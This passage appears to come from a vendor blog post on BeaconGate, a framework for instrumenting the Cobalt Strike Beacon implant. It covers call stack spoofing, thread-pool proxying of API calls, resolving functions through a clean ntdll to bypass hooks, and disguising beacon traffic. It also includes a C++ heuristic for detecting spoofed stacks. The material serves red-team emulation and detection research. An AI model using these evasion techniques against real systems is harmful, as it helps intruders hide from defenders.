Below is a screenshot of Beacon being instrumented with the draugr-sleepmask BOF:

Fig 12. A screenshot showing Beacon being instrumented with the draugr-sleepmask. In this example, we have attached WinDbg to the Beacon process and set a breakpoint on ntdll!NtAllocateVirtualMemory. We then executed the virtualalloc.x64.o BOF, which triggered the breakpoint. The knf command in WinDbg is then used to display the call stack, showing the fake call stack produced by Draugr.

Note: While Draugr generates a ‘legitimate’ looking call stack, it will still have an entry which returns to a gadget. This gadget will typically point to an arbitrary location within the function where the gadget was found. Therefore, it will not be preceded by a legitimate call instruction and hence could be a detection opportunity (see image_rop):

0:002> knf 
 #   Memory  Child-SP          RetAddr               Call Site 
00           00000000`00c7e558 00007ffa`7e56e978     ntdll!NtAllocateVirtualMemory 
01         8 00000000`00c7e560 00007ffa`7e5417dc     KERNELBASE!VirtualAlloc+0x48 
02        40 00000000`00c7e5a0 00007ffa`7e5417dc     KERNELBASE!CreateFileInternal+0x34c  // This is the gadget 
03       170 00000000`00c7e710 00007ffa`80edcc91     KERNEL32!BaseThreadInitThunk+0x14 
04        30 00000000`00c7e740 00000000`00000000     ntdll!RtlUserThreadStart+0x21

0:002> db 00007ffa`7e5417dc L2    // Display 2 bytes at 00007ffa`7e5417dc
00007ffa`7e5417dc  ff 23    // jmp [rbx] 

0:002> uf 00007ffa`7e5417dc    // Disassemble function at gadget address (00007ffa`7e5417dc)
KERNELBASE!CreateFileInternal: 
[ … ] 
00007ffa`7e5417d5 0f8467ffffff    je      KERNELBASE!CreateFileInternal+0x2b2 (00007ffa`7e541742)  Branch 

KERNELBASE!CreateFileInternal+0x34b: 

00007ffa`7e5417db 81ff230000c0    cmp     edi,0C0000023h    // Gadget is pointing to the middle of this instruction

00007ffa`7e5417e1 0f845bffffff    je      KERNELBASE!CreateFileInternal+0x2b2 (00007ffa`7e541742)  Branch
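The detection idea can be sketched as a simple heuristic: look at the bytes immediately before a return address and check whether they could be a call instruction. The code below is an illustrative approximation and not how any particular product implements it; LooksCallPreceded is a hypothetical helper that recognises call rel32 (E8) and the common call r/m64 (FF /2) encodings, and it can produce false positives because it does not fully disassemble.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Heuristic: could the bytes ending at code[retOffset] be a call instruction?
inline bool LooksCallPreceded(const uint8_t* code, size_t retOffset) {
    assert(code != nullptr);
    // call rel32: E8 followed by a 4-byte displacement (5 bytes in total).
    if (retOffset >= 5 && code[retOffset - 5] == 0xE8) {
        return true;
    }
    // call r/m64: FF /2, whose length depends on the ModRM addressing form.
    const size_t lengths[] = { 2, 3, 4, 6, 7 };
    for (size_t len : lengths) {
        if (retOffset < len) continue;
        const uint8_t* p = code + retOffset - len;
        if (p[0] != 0xFF) continue;
        const uint8_t mod = p[1] >> 6;
        const uint8_t reg = (p[1] >> 3) & 7;
        const uint8_t rm  = p[1] & 7;
        if (reg != 2) continue;                       // /2 selects "call"
        size_t expected = 2;                          // opcode + ModRM
        if (mod != 3 && rm == 4) {
            expected += 1;                            // SIB byte present
            if (len >= 3 && mod == 0 && (p[2] & 7) == 5) {
                expected += 4;                        // SIB without base: disp32
            }
        }
        if (mod == 1) {
            expected += 1;                            // disp8
        } else if (mod == 2 || (mod == 0 && rm == 5)) {
            expected += 4;                            // disp32 or rip-relative
        }
        if (expected == len) return true;
    }
    return false;
}
```

Applied to the bytes surrounding the gadget shown above (0f 84 67 ff ff ff 81 ff 23 00 00 c0, with the return address pointing at ff 23), the check finds no plausible call, whereas a genuine return address following call rax (ff d0) or call [rip+disp32] (ff 15 ...) passes.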

Taking It Further

The examples given in this blog post are intended primarily to show how BeaconGate works, how flexible it is, and to demonstrate how to get up and running with it. However, the sky is the limit in terms of emulating threat actors. For example, some malware will attempt to proxy suspicious API calls via an OS callback to obtain a ‘clean’ call stack. This can be emulated in BeaconGate, as demonstrated in the screenshot below, which shows a PoC Sleepmask proxying WinAPI calls through the thread pool:

Fig 13. A screenshot showing Beacon being instrumented with a PoC Sleepmask which will proxy all calls through the thread pool. For this example, we have set a breakpoint on ntdll!NtAllocateVirtualMemory. We then once again executed the virtualalloc.x64.o BOF, which triggered the breakpoint. The knf command in WinDbg is then used to display the call stack, showing that the call has been executed by the thread pool (ntdll!TppWorkerThread).

Alternatively, this approach could be quickly modified to use another callback (searching for callback site:learn.microsoft.com can produce interesting results). Be aware though that these techniques can be easy to signature.

Note: The callback function may have restrictions on the max number of arguments that it supports before the stack is corrupted, which can limit the use of these techniques for general purpose call gates (for example, for TppWorkpExecuteCallback it is 6). You can work out the size of a given function’s stack frame via the WinDbg .fnent ntdll!TppWorkpExecuteCallback command. However, you will still need to calculate the size of the various unwind codes.

Another good example is porting instrumentation hooks which were previously implemented as part of a UDRL into BeaconGate. For example, we could quickly port TitanLdr’s VirtualAllocEx hook into BeaconGate, which maps a copy of \\KnownDlls\\ntdll and resolves any target functions via a clean ntdll to avoid hooks. 

As a final example of how we could potentially instrument Beacon, one common feature request for Beacon is for some form of random user browsing behaviour. With BeaconGate you can subscribe to a hook for InternetConnectA (for HTTP beacons). At this point, you could actually make a number of other ‘random’ requests via HttpOpenRequest if desired, add additional custom jitters, or even wait for user activity before checking in. As this last example suggests, we can start to think of BeaconGate as a generic instrumentation BOF for Beacon.
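One way to picture "subscribing to a hook" is a small table of pre-call handlers keyed by the proxied API. The sketch below is purely illustrative and not part of Sleepmask-VS: MockWinApi, SubscribeHook, GateWithHooks, DecoyTrafficHook and FakeExecute are hypothetical, and the hook body is a counter standing in for whatever extra requests, jitter or user-activity checks you might add.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical subset of the proxied API enum.
enum class MockWinApi { INTERNETCONNECTA, VIRTUALALLOC, COUNT };

// Simplified stand-in for FUNCTION_CALL (an assumption for this sketch).
struct MockFunctionCall {
    MockWinApi function;
    uintptr_t  retValue;
};

using PreCallHook = void (*)(MockFunctionCall*);
using ExecuteFn   = uintptr_t (*)(MockFunctionCall*);

// One optional pre-call hook per API; nullptr means "no hook registered".
static PreCallHook gPreCallHooks[static_cast<int>(MockWinApi::COUNT)] = {};

inline void SubscribeHook(MockWinApi api, PreCallHook hook) {
    gPreCallHooks[static_cast<int>(api)] = hook;
}

// Run the registered hook (if any) and then execute the call as usual.
inline void GateWithHooks(MockFunctionCall* call, ExecuteFn execute) {
    assert(call != nullptr && execute != nullptr);
    if (PreCallHook hook = gPreCallHooks[static_cast<int>(call->function)]) {
        hook(call);
    }
    call->retValue = execute(call);
}

// Placeholder hook: counts invocations where real code might add decoy traffic.
static int gDecoyRequests = 0;
inline void DecoyTrafficHook(MockFunctionCall*) { ++gDecoyRequests; }

// Placeholder for the real call gate.
inline uintptr_t FakeExecute(MockFunctionCall*) { return 1; }
```

Only calls to the subscribed API pay the cost of the hook; everything else falls straight through to the normal execution path.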

Development Tips

To start developing your own custom call gate BOFs you will need to add a new .cpp file to the root directory. As with BOF-VS, Sleepmask-VS will compile any BOFs in the root directory automatically. This BOF will be the main entry point of your custom Sleepmask and will hence need to expose the sleep_mask(PSLEEPMASK_INFO info, PFUNCTION_CALL functionCall) entry point. 
 
If you add new library code, you will also need to include it in your main entry point. As an example, for indirectsyscalls-sleepmask.cpp we needed to add the following:

/* Additional includes for sys call code. */ 
#include "library\syscallapi.cpp" 
#include "library\indirectsyscalls.cpp"

To test everything is working as expected, we have provided some unit tests in Sleepmask-VS. These will run by default when any of the example Sleepmasks are run in debug mode without a debugger attached (i.e. via Start Without Debugging), as shown below:

Fig 14. A screenshot showing the unit tests which are run by default for each debug exe.

Furthermore, there is also a unit test BOF provided which can be run once a custom call gate has been applied to an exported Beacon payload. This will call all the Beacon<WinAPI> functions and check that values are returned as expected. The sleepmask.cna script will automatically register a new command run_beacongate_tests which will execute this unit test BOF. This is demonstrated in the screenshot below:

Fig 15. A screenshot showing the run_beacongate_tests command in action.

Lastly, the makefile has been adjusted to build with the /A flag to force a build of all targets. This was to solve previous issues of the template needing to be constantly cleaned and rebuilt to get the latest changes.

Closing Thoughts

The objective of this blog was to demonstrate how BeaconGate can be used to quickly develop custom runtime instrumentation for Beacon, with a focus on call stack spoofing techniques. Furthermore, because we can implement this via the Sleepmask BOF and Malleable C2, it provides an equally powerful and more user-friendly alternative to instrumenting Beacon with a UDRL via IAT hooking and PIC stubs. Additionally, while this blog has focused on call stack spoofing, BeaconGate can be thought of as a general instrumentation framework for all supported APIs (think Frida for Beacon!). Hence, it is also possible to instrument Beacon’s network comms (i.e. only send data when a user is active, send random requests before any beaconing etc.), perform custom cleanup actions on ExitThread etc. Lastly, we have demonstrated how Sleepmask-VS can be used to aid the development process for PoC’ing, debugging and testing custom call gates.